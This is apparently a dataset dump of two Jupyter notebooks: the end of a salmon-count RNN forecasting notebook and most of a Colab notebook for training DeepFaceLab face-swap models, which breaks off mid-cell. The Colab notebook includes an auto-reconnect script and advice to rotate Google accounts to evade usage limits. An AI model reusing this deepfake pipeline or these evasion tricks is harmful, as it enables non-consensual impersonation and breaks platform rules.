"Epoch 1/1000\n15/15 [==============================] - 2s 6ms/step - loss: 0.0345\nEpoch 2/1000\n15/15 [==============================] - ETA: 0s - loss: 0.012 - 0s 7ms/step - loss: 0.0122\nEpoch 3/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0097\nEpoch 4/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0079\nEpoch 5/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0104\nEpoch 6/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0098\nEpoch 7/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0075\nEpoch 8/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0084\nEpoch 9/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0060\nEpoch 10/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0084\nEpoch 11/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0074\nEpoch 12/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0090\nEpoch 13/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0081\nEpoch 14/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0072\nEpoch 15/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0093\nEpoch 16/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0065\nEpoch 17/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0059\nEpoch 18/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0077\nEpoch 19/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0070\nEpoch 20/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0073\nEpoch 21/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0082\nEpoch 22/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0078\nEpoch 23/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0069\nEpoch 24/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0063\nEpoch 25/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0083\nEpoch 26/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0060\nEpoch 27/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0059\nEpoch 28/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0069\nEpoch 29/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0070\nEpoch 30/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0067\nEpoch 31/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0061\nEpoch 32/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0061\nEpoch 33/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0051\nEpoch 34/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0066\nEpoch 35/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0063\nEpoch 36/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0069\nEpoch 37/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0066\nEpoch 38/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0062\nEpoch 39/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0042\nEpoch 40/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0057\nEpoch 41/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0069\nEpoch 42/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0052\nEpoch 43/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0042\nEpoch 44/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0057\nEpoch 45/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0063\nEpoch 46/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0066\nEpoch 47/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0050\nEpoch 48/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0057\nEpoch 49/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0072\nEpoch 50/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0044\nEpoch 51/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0057\nEpoch 52/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0045\nEpoch 53/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0055\nEpoch 54/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0048\nEpoch 55/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0053\nEpoch 56/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0053\nEpoch 57/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0042\nEpoch 58/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0048\nEpoch 59/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0060\nEpoch 60/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0048\nEpoch 61/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0042\nEpoch 62/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0054\nEpoch 63/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0046\nEpoch 64/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0043\nEpoch 65/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0035\nEpoch 66/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0052\nEpoch 67/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0052\nEpoch 68/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0042\nEpoch 69/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0059\nEpoch 70/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0047\nEpoch 71/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0054\nEpoch 72/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0050\nEpoch 73/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0053\nEpoch 74/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0046\nEpoch 75/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0059\nEpoch 76/1000\n15/15 [==============================] - 0s 11ms/step - loss: 0.0056\nEpoch 77/1000\n15/15 [==============================] - 0s 11ms/step - loss: 0.0055\nEpoch 78/1000\n15/15 [==============================] - 0s 9ms/step - loss: 0.0065\nEpoch 79/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0036\nEpoch 80/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0042\nEpoch 81/1000\n15/15 [==============================] - 0s 13ms/step - loss: 0.0050\nEpoch 82/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0043\nEpoch 83/1000\n15/15 [==============================] - 0s 5ms/step - loss: 0.0047\nEpoch 84/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0040\nEpoch 85/1000\n15/15 [==============================] - 0s 9ms/step - loss: 0.0042\nEpoch 86/1000\n15/15 [==============================] - 0s 9ms/step - loss: 0.0041\nEpoch 87/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0047\nEpoch 88/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0055\nEpoch 89/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0049\nEpoch 90/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0041\nEpoch 91/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0056\nEpoch 92/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0048\nEpoch 93/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0041\nEpoch 94/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0059\nEpoch 95/1000\n15/15 [==============================] - 0s 5ms/step - loss: 0.0045\nEpoch 96/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0039\nEpoch 97/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0045\nEpoch 98/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0044\nEpoch 99/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0050\nEpoch 100/1000\n"
],
[
"# plot single_layer_rnn_model\nplot_predictions(y_train, RNN_train_preds)\nreturn_rmse(y_train, RNN_train_preds)\nprint(RNN_train_preds.shape)",
"_____no_output_____"
],
[
"plot_predictions(y_test, RNN_test_preds)\nreturn_rmse(y_test, RNN_test_preds)",
"_____no_output_____"
],
[
"plot_loss(history_RNN)",
"_____no_output_____"
],
[
"# global var for baseline\ny_test_year = month_to_year(y_test)\nlen(y_test)\nlen(y_test_year)",
"49\n"
],
[
"y_test_year = month_to_year(y_test)\nbs_chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/Forecast Data Update.csv'\nbs_ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/forecast_data_17_20.csv'\nbs_abdul_path = '/Users/abdul/Downloads/SalmonNet/Forecast Data Update.csv'\nbaseline_data = pd.read_csv(bs_chris_path)\ntraditional = pd.DataFrame(baseline_data[\"Count\"])\nprint(traditional)\ny_test_year = y_test_year.astype(np.int64)\nprint(y_test_year)\n# print(GRU_test_year)",
"49\n Count\n0 498710\n1 439060\n2 294840\n3 347600\n Count\n0 488943\n1 336031\n2 381766\n3 535809\n"
],
[
"RNN_test_year = month_to_year(RNN_test_preds)\nRNN_test_year",
"49\n"
],
[
"# test RMSE with baseline and RNN\nreturn_rmse(y_test_year, traditional)\nreturn_rmse(y_test_year, RNN_test_year)",
"The root mean squared error is 115854.5707848853.\nThe root mean squared error is 125878.43991824017.\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2bcfd1c1473ee5931fa82db3508d6787884500 | 32,150 | ipynb | Jupyter Notebook | DFL_Colab.ipynb | miguelrodriguezpro/Django-Twitter-Clone | 9893367b49d854aeb8f47ab4ca2a58afdfcf833b | [
"MIT"
] | null | null | null | DFL_Colab.ipynb | miguelrodriguezpro/Django-Twitter-Clone | 9893367b49d854aeb8f47ab4ca2a58afdfcf833b | [
"MIT"
] | null | null | null | DFL_Colab.ipynb | miguelrodriguezpro/Django-Twitter-Clone | 9893367b49d854aeb8f47ab4ca2a58afdfcf833b | [
"MIT"
] | 1 | 2022-03-28T16:50:12.000Z | 2022-03-28T16:50:12.000Z | 40.237797 | 356 | 0.519285 | [
[
[
"# Welcome to DFL-Colab!\n\nThis is an adapted version of the DFL for Google Colab.\n\n\n# Overview\n* Extractor works in full functionality.\n* Training can work without preview.\n* Merger works in full functionality.\n* You can import/export workspace with your Google Drive.\n* Import/export and another manipulations with workspace you can do in \"Manage workspace\" block\n* Google Colab machine active for 12 hours. DFL-Colab makes a backup of your workspace in training mode.\n* Google does not like long-term heavy calculations. Therefore, for training more than two sessions in a row, use two Google accounts. It is recommended to split your training over 2 accounts, but you can use one Google Drive account to store your workspace.\n\n",
"_____no_output_____"
],
[
"## Prevent random disconnects\n\nThis cell runs JS code to automatic reconnect to runtime.",
"_____no_output_____"
]
],
[
[
"import IPython\nfrom google.colab import output\n\ndisplay(IPython.display.Javascript('''\n function ClickConnect(){\n btn = document.querySelector(\"colab-connect-button\")\n if (btn != null){\n console.log(\"Click colab-connect-button\"); \n btn.click() \n }\n \n btn = document.getElementById('ok')\n if (btn != null){\n console.log(\"Click reconnect\"); \n btn.click() \n }\n }\n \nsetInterval(ClickConnect,60000)\n'''))\n\nprint(\"Done.\")",
"_____no_output_____"
]
],
[
[
"## Check GPU\n\n* Google Colab can provide you with one of Tesla graphics cards: K80, T4, P4 or P100\n* Here you can check the model of GPU before using DeepFaceLab\n\n",
"_____no_output_____"
]
],
[
[
"!nvidia-smi",
"_____no_output_____"
]
],
[
[
"## Install or update DeepFaceLab\n\n* Install or update DeepFAceLab directly from Github\n* Requirements install is automatically\n* Automatically sets timer to prevent random disconnects\n* \"Download FFHQ\" option means to download high quality FFHQ dataset instead of CelebA. FFHQ takes up more memory, so it will take longer to download than CelebA. It is recommended to enable this option if you are doing pretrain.",
"_____no_output_____"
]
],
[
[
"#@title Install or update DeepFaceLab from Github\n\nMode = \"install\" #@param [\"install\", \"update\"]\nDownload_FFHQ = False #@param {type:\"boolean\"}\n\n\npretrain_link = \"https://github.com/chervonij/DFL-Colab/releases/download/\"\npretrain_link = pretrain_link+\"pretrain_GenericFFHQ/pretrain_FFHQ.zip\" if Download_FFHQ else pretrain_link+\"pretrain-CelebA/pretrain_CelebA.zip\"\n\nfrom pathlib import Path\nif (Mode == \"install\"):\n !git clone https://github.com/iperov/DeepFaceLab.git\n %cd \"/content/DeepFaceLab\"\n #!git checkout 9ad9728b4021d1dff62905cce03e2157d0c0868d\n %cd \"/content\"\n\n # fix linux warning\n # /usr/lib/python3.6/multiprocessing/semaphore_tracker.py:143: UserWarning: semaphore_tracker: There appear to be 1 leaked semaphores to clean up at shutdown\n fin = open(\"/usr/lib/python3.6/multiprocessing/semaphore_tracker.py\", \"rt\")\n data = fin.read()\n data = data.replace('if cache:', 'if False:')\n fin.close()\n\n fin = open(\"/usr/lib/python3.6/multiprocessing/semaphore_tracker.py\", \"wt\")\n fin.write(data)\n fin.close()\nelse:\n %cd /content/DeepFaceLab\n !git pull\n\n!pip uninstall -y tensorflow\n!pip install -r /content/DeepFaceLab/requirements-colab.txt\n!pip install --upgrade scikit-image\n!apt-get install cuda-10-0\n\nif not Path(\"/content/pretrain\").exists():\n print(\"Downloading Pretrain faceset ... \")\n !wget -q --no-check-certificate -r $pretrain_link -O /content/pretrain_faceset.zip\n !mkdir /content/pretrain\n !unzip -q /content/pretrain_faceset.zip -d /content/pretrain/\n !rm /content/pretrain_faceset.zip\n\nif not Path(\"/content/pretrain_Q96\").exists():\n print(\"Downloading Q96 pretrained model ...\")\n !wget -q --no-check-certificate -r 'https://github.com/chervonij/DFL-Colab/releases/download/Q96_model_pretrained/Q96_model_pretrained.zip' -O /content/pretrain_Q96.zip\n !mkdir /content/pretrain_Q96\n !unzip -q /content/pretrain_Q96.zip -d /content/pretrain_Q96/\n !rm /content/pretrain_Q96.zip\n\nif not Path(\"/content/workspace\").exists():\n !mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model \n\nimport IPython\nfrom google.colab import output\n\ndisplay(IPython.display.Javascript('''\n function ClickConnect(){\n btn = document.querySelector(\"colab-connect-button\")\n if (btn != null){\n console.log(\"Click colab-connect-button\"); \n btn.click() \n }\n \n btn = document.getElementById('ok')\n if (btn != null){\n console.log(\"Click reconnect\"); \n btn.click() \n }\n }\n \nsetInterval(ClickConnect,60000)\n'''))\n\nprint(\"\\nDone!\")",
"_____no_output_____"
]
],
[
[
"## Manage workspace\n\n\n\n* You can import/export workspace or individual data, like model files with Google Drive\n* Also, you can use HFS (HTTP Fileserver) for directly import/export you workspace from your computer\n* You can clear all workspace or delete part of it\n\n",
"_____no_output_____"
]
],
[
[
"#@title Import from Drive\n\nMode = \"workspace\" #@param [\"workspace\", \"data_src\", \"data_dst\", \"data_src aligned\", \"data_dst aligned\", \"models\"]\nArchive_name = \"workspace.zip\" #@param {type:\"string\"}\n\n#Mount Google Drive as folder\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\ndef zip_and_copy(path, mode):\n unzip_cmd=\" -q \"+Archive_name\n \n %cd $path\n copy_cmd = \"/content/drive/My\\ Drive/\"+Archive_name+\" \"+path\n !cp $copy_cmd\n !unzip $unzip_cmd \n !rm $Archive_name\n\nif Mode == \"workspace\":\n zip_and_copy(\"/content\", \"workspace\")\nelif Mode == \"data_src\":\n zip_and_copy(\"/content/workspace\", \"data_src\")\nelif Mode == \"data_dst\":\n zip_and_copy(\"/content/workspace\", \"data_dst\")\nelif Mode == \"data_src aligned\":\n zip_and_copy(\"/content/workspace/data_src\", \"aligned\")\nelif Mode == \"data_dst aligned\":\n zip_and_copy(\"/content/workspace/data_dst\", \"aligned\")\nelif Mode == \"models\":\n zip_and_copy(\"/content/workspace\", \"model\")\n \nprint(\"Done!\")\n\n",
"_____no_output_____"
],
[
"#@title Export to Drive { form-width: \"30%\" }\nMode = \"workspace\" #@param [\"workspace\", \"data_src\", \"data_dst\", \"data_src aligned\", \"data_dst aligned\", \"merged\", \"merged_mask\", \"models\", \"result video\", \"result_mask video\"]\nArchive_name = \"workspace.zip\" #@param {type:\"string\"}\n\n#Mount Google Drive as folder\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\ndef zip_and_copy(path, mode):\n zip_cmd=\"-0 -r -q \"+Archive_name+\" \"\n \n %cd $path\n zip_cmd+=mode\n !zip $zip_cmd\n copy_cmd = \" \"+Archive_name+\" /content/drive/My\\ Drive/\"\n !cp $copy_cmd\n !rm $Archive_name\n\nif Mode == \"workspace\":\n zip_and_copy(\"/content\", \"workspace\")\nelif Mode == \"data_src\":\n zip_and_copy(\"/content/workspace\", \"data_src\")\nelif Mode == \"data_dst\":\n zip_and_copy(\"/content/workspace\", \"data_dst\")\nelif Mode == \"data_src aligned\":\n zip_and_copy(\"/content/workspace/data_src\", \"aligned\")\nelif Mode == \"data_dst aligned\":\n zip_and_copy(\"/content/workspace/data_dst\", \"aligned\")\nelif Mode == \"merged\":\n zip_and_copy(\"/content/workspace/data_dst\", \"merged\")\nelif Mode == \"merged_mask\":\n zip_and_copy(\"/content/workspace/data_dst\", \"merged_mask\")\nelif Mode == \"models\":\n zip_and_copy(\"/content/workspace\", \"model\")\nelif Mode == \"result video\":\n !cp /content/workspace/result.mp4 /content/drive/My\\ Drive/\nelif Mode == \"result_mask video\":\n !cp /content/workspace/result_mask.mp4 /content/drive/My\\ Drive/\n \nprint(\"Done!\")\n",
"_____no_output_____"
],
[
"#@title Import from URL{ form-width: \"30%\", display-mode: \"form\" }\nURL = \"http://\" #@param {type:\"string\"}\nMode = \"unzip to content\" #@param [\"unzip to content\", \"unzip to content/workspace\", \"unzip to content/workspace/data_src\", \"unzip to content/workspace/data_src/aligned\", \"unzip to content/workspace/data_dst\", \"unzip to content/workspace/data_dst/aligned\", \"unzip to content/workspace/model\", \"download to content/workspace\"]\n\nimport urllib.request\nfrom pathlib import Path\n\ndef unzip(zip_path, dest_path):\n\n \n unzip_cmd = \" unzip -q \" + zip_path + \" -d \"+dest_path\n !$unzip_cmd \n rm_cmd = \"rm \"+dest_path + url_path.name\n !$rm_cmd\n print(\"Unziped!\")\n \n\nif Mode == \"unzip to content\":\n dest_path = \"/content/\"\nelif Mode == \"unzip to content/workspace\":\n dest_path = \"/content/workspace/\"\nelif Mode == \"unzip to content/workspace/data_src\":\n dest_path = \"/content/workspace/data_src/\"\nelif Mode == \"unzip to content/workspace/data_src/aligned\":\n dest_path = \"/content/workspace/data_src/aligned/\"\nelif Mode == \"unzip to content/workspace/data_dst\":\n dest_path = \"/content/workspace/data_dst/\"\nelif Mode == \"unzip to content/workspace/data_dst/aligned\":\n dest_path = \"/content/workspace/data_dst/aligned/\"\nelif Mode == \"unzip to content/workspace/model\":\n dest_path = \"/content/workspace/model/\"\nelif Mode == \"download to content/workspace\":\n dest_path = \"/content/workspace/\"\n\nif not Path(\"/content/workspace\").exists():\n cmd = \"mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model\"\n !$cmd\n\nurl_path = Path(URL)\nurllib.request.urlretrieve ( URL, dest_path + url_path.name )\n\nif (url_path.suffix == \".zip\") and (Mode!=\"download to content/workspace\"):\n unzip(dest_path + url_path.name, dest_path)\n\n \nprint(\"Done!\")",
"_____no_output_____"
],
[
"#@title Export to URL\nURL = \"http://\" #@param {type:\"string\"}\nMode = \"upload workspace\" #@param [\"upload workspace\", \"upload data_src\", \"upload data_dst\", \"upload data_src aligned\", \"upload data_dst aligned\", \"upload merged\", \"upload model\", \"upload result video\"]\n\ncmd_zip = \"zip -0 -r -q \"\n\ndef run_cmd(zip_path, curl_url):\n cmd_zip = \"zip -0 -r -q \"+zip_path\n cmd_curl = \"curl --silent -F \"+curl_url+\" -D out.txt > /dev/null\"\n !$cmd_zip\n !$cmd_curl\n\n\nif Mode == \"upload workspace\":\n %cd \"/content\"\n run_cmd(\"workspace.zip workspace/\",\"'data=@/content/workspace.zip' \"+URL)\nelif Mode == \"upload data_src\":\n %cd \"/content/workspace\"\n run_cmd(\"data_src.zip data_src/\", \"'data=@/content/workspace/data_src.zip' \"+URL)\nelif Mode == \"upload data_dst\":\n %cd \"/content/workspace\"\n run_cmd(\"data_dst.zip data_dst/\", \"'data=@/content/workspace/data_dst.zip' \"+URL)\nelif Mode == \"upload data_src aligned\":\n %cd \"/content/workspace\"\n run_cmd(\"data_src_aligned.zip data_src/aligned\", \"'data=@/content/workspace/data_src_aligned.zip' \"+URL )\nelif Mode == \"upload data_dst aligned\":\n %cd \"/content/workspace\"\n run_cmd(\"data_dst_aligned.zip data_dst/aligned/\", \"'data=@/content/workspace/data_dst_aligned.zip' \"+URL)\nelif Mode == \"upload merged\":\n %cd \"/content/workspace/data_dst\"\n run_cmd(\"merged.zip merged/\",\"'data=@/content/workspace/data_dst/merged.zip' \"+URL )\nelif Mode == \"upload model\":\n %cd \"/content/workspace\"\n run_cmd(\"model.zip model/\", \"'data=@/content/workspace/model.zip' \"+URL)\nelif Mode == \"upload result video\":\n %cd \"/content/workspace\"\n run_cmd(\"result.zip result.mp4\", \"'data=@/content/workspace/result.zip' \"+URL)\n \n \n!rm *.zip\n\n%cd \"/content\"\nprint(\"Done!\")",
"_____no_output_____"
],
[
"#@title Delete and recreate\nMode = \"Delete and recreate workspace\" #@param [\"Delete and recreate workspace\", \"Delete models\", \"Delete data_src\", \"Delete data_src aligned\", \"Delete data_src video\", \"Delete data_dst\", \"Delete data_dst aligned\", \"Delete merged frames\"]\n\n%cd \"/content\" \n\nif Mode == \"Delete and recreate workspace\":\n cmd = \"rm -r /content/workspace ; mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model\" \nelif Mode == \"Delete models\":\n cmd = \"rm -r /content/workspace/model/*\"\nelif Mode == \"Delete data_src\":\n cmd = \"rm /content/workspace/data_src/*.png || rm -r /content/workspace/data_src/*.jpg\"\nelif Mode == \"Delete data_src aligned\":\n cmd = \"rm -r /content/workspace/data_src/aligned/*\"\nelif Mode == \"Delete data_src video\":\n cmd = \"rm -r /content/workspace/data_src.*\"\nelif Mode == \"Delete data_dst\":\n cmd = \"rm /content/workspace/data_dst/*.png || rm /content/workspace/data_dst/*.jpg\"\nelif Mode == \"Delete data_dst aligned\":\n cmd = \"rm -r /content/workspace/data_dst/aligned/*\"\nelif Mode == \"Delete merged frames\":\n cmd = \"rm -r /content/workspace/data_dst/merged; rm -r /content/workspace/data_dst/merged_mask\"\n \n!$cmd\nprint(\"Done!\")",
"_____no_output_____"
]
],
[
[
"## Extract, sorting and faceset tools\n* Extract frames for SRC or DST video.\n* Denoise SRC or DST video. \"Factor\" param set intesity of denoising\n* Detect and align faces. If you need, you can get frames with debug landmarks.\n* Export workspace to Google Drive after extract and sort it manually (In \"Manage Workspace\" block)\n* You can enhance your facesets with DFL FacesetEnhancer.\n* Resize faceset to your model resolution. Since Colab doesn't have a powerful CPU, resizing samples during training increases iteration time. Faceset resize reduces iteration time by about 2x times. Don't forget to keep save original faceset on your PC.\n* Pack or unpack facesets with DFL packing tool.\n* Apply or remove trained XSeg model to the extracted faces.\n* Recommended for use, Generic XSeg model for auto segmentation.\n",
"_____no_output_____"
]
],
[
[
"#@title Extract frames\nVideo = \"data_src\" #@param [\"data_src\", \"data_dst\"]\n\n%cd \"/content\"\n\ncmd = \"DeepFaceLab/main.py videoed extract-video\"\n\nif Video == \"data_dst\":\n cmd+= \" --input-file workspace/data_dst.* --output-dir workspace/data_dst/\"\nelse:\n cmd+= \" --input-file workspace/data_src.* --output-dir workspace/data_src/\"\n \n!python $cmd",
"_____no_output_____"
],
[
"#@title Denoise frames\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nFactor = 1 #@param {type:\"slider\", min:1, max:20, step:1}\n\ncmd = \"DeepFaceLab/main.py videoed denoise-image-sequence --input-dir workspace/\"+Data+\" --factor \"+str(Factor)\n\n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Detect faces\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nDetector = \"S3FD\" #@param [\"S3FD\", \"S3FD (whole face)\"]\nDebug = False #@param {type:\"boolean\"}\n\ndetect_type = \"s3fd\"\ndbg = \" --output-debug\" if Debug else \" --no-output-debug\"\n\nfolder = \"workspace/\"+Data\nfolder_aligned = folder+\"/aligned\"\n\ncmd = \"DeepFaceLab/main.py extract --input-dir \"+folder+\" --output-dir \"+folder_aligned\ncmd+=\" --detector \"+detect_type+\" --force-gpu-idxs 0\"+dbg\n\nif \"whole face\" in Detector:\n cmd+=\" --face-type whole_face\" \n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Sort aligned\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nsort_type = \"hist\" #@param [\"blur\", \"motion-blur\", \"face-yaw\", \"face-pitch\", \"face-source-rect-size\", \"hist\", \"hist-dissim\", \"brightness\", \"hue\", \"black\", \"origname\", \"oneface\", \"final-by-blur\", \"final-by-size\", \"absdiff\"]\n\ncmd = \"DeepFaceLab/main.py sort --input-dir workspace/\"+Data+\"/aligned --by \"+sort_type\n\n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Faceset Enhancer\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\n\ndata_path = \"/content/workspace/\"+Data+\"/aligned\"\ncmd = \"/content/DeepFaceLab/main.py facesettool enhance --input-dir \"+data_path\n!python $cmd",
"_____no_output_____"
],
[
"#@title Resize faceset\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\n\ncmd = \"/content/DeepFaceLab/main.py facesettool resize --input-dir /content/workspace/\" + \\\n f\"{Data}/aligned\"\n\n!python $cmd",
"_____no_output_____"
],
[
"#@title Pack/Unpack aligned faceset\n\nFolder = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nMode = \"unpack\" #@param [\"pack\", \"unpack\"]\n\ncmd = \"/content/DeepFaceLab/main.py util --input-dir /content/workspace/\" + \\\n f\"{Folder}/aligned --{Mode}-faceset\"\n\n!python $cmd",
"_____no_output_____"
],
[
"#@title Apply or remove XSeg mask to the faces\nMode = \"Apply mask\" #@param [\"Apply mask\", \"Remove mask\"]\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nGenericXSeg = True #@param {type:\"boolean\"}\n\nfrom pathlib import Path\nmode_arg = 'apply' if Mode == \"Apply mask\" else 'remove'\n\nif GenericXSeg and not Path('/content/GenericXSeg').exists():\n print('Downloading Generic XSeg model ... ')\n xseg_link = 'https://github.com/chervonij/DFL-Colab/releases/download/GenericXSeg/GenericXSeg.zip'\n !mkdir /content/GenericXSeg\n !wget -q --no-check-certificate -r $xseg_link -O /content/GenericXSeg.zip\n !unzip -q /content/GenericXSeg.zip -d /content/GenericXSeg/\n !rm /content/GenericXSeg.zip\n\nmain_path = '/content/DeepFaceLab/main.py'\ndata_path = f'/content/workspace/{Data}/aligned'\nmodel_path = '/content/workspace/model' if not GenericXSeg else '/content/GenericXSeg'\n\ncmd = f'{main_path} xseg {mode_arg} --input-dir {data_path} '\ncmd += f'--model-dir {model_path}' if mode_arg == 'apply' else ''\n\n!python $cmd",
"_____no_output_____"
]
],
[
[
"## Train model\n\n* Choose your model type, but SAEHD is recommend for everyone\n* Set model options on output field\n* You can see preview manually, if go to model folder in filemanager and double click on preview.jpg file\n* Your workspace will be archived and upload to mounted Drive after 11 hours from start session\n* If you select \"Backup_every_hour\" option, your workspace will be backed up every hour.\n* Also, you can export your workspace manually in \"Manage workspace\" block\n* \"Silent_Start\" option provides to automatically start with best GPU and last used model. ",
"_____no_output_____"
]
],
[
[
"#@title Training\nModel = \"SAEHD\" #@param [\"SAEHD\", \"AMP\", \"Quick96\", \"XSeg\"]\nBackup_every_hour = True #@param {type:\"boolean\"}\nSilent_Start = True #@param {type:\"boolean\"}\n\n%cd \"/content\"\n\n#Mount Google Drive as folder\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\nimport psutil, os, time\n\np = psutil.Process(os.getpid())\nuptime = time.time() - p.create_time()\n\nif (Backup_every_hour):\n if not os.path.exists('workspace.zip'):\n print(\"Creating workspace archive ...\")\n !zip -0 -r -q workspace.zip workspace\n print(\"Archive created!\")\n else:\n print(\"Archive exist!\")\n\nif (Backup_every_hour):\n print(\"Time to end session: \"+str(round((43200-uptime)/3600))+\" hours\")\n backup_time = str(3600)\n backup_cmd = \" --execute-program -\"+backup_time+\" \\\"import os; os.system('zip -0 -r -q workspace.zip workspace/model'); os.system('cp /content/workspace.zip /content/drive/My\\ Drive/'); print('Backed up!') \\\"\" \nelif (round(39600-uptime) > 0):\n print(\"Time to backup: \"+str(round((39600-uptime)/3600))+\" hours\")\n backup_time = str(round(39600-uptime))\n backup_cmd = \" --execute-program \"+backup_time+\" \\\"import os; os.system('zip -0 -r -q workspace.zip workspace'); os.system('cp /content/workspace.zip /content/drive/My\\ Drive/'); print('Backed up!') \\\"\" \nelse:\n print(\"Session expires in less than an hour.\")\n backup_cmd = \"\"\n \ncmd = \"DeepFaceLab/main.py train --training-data-src-dir 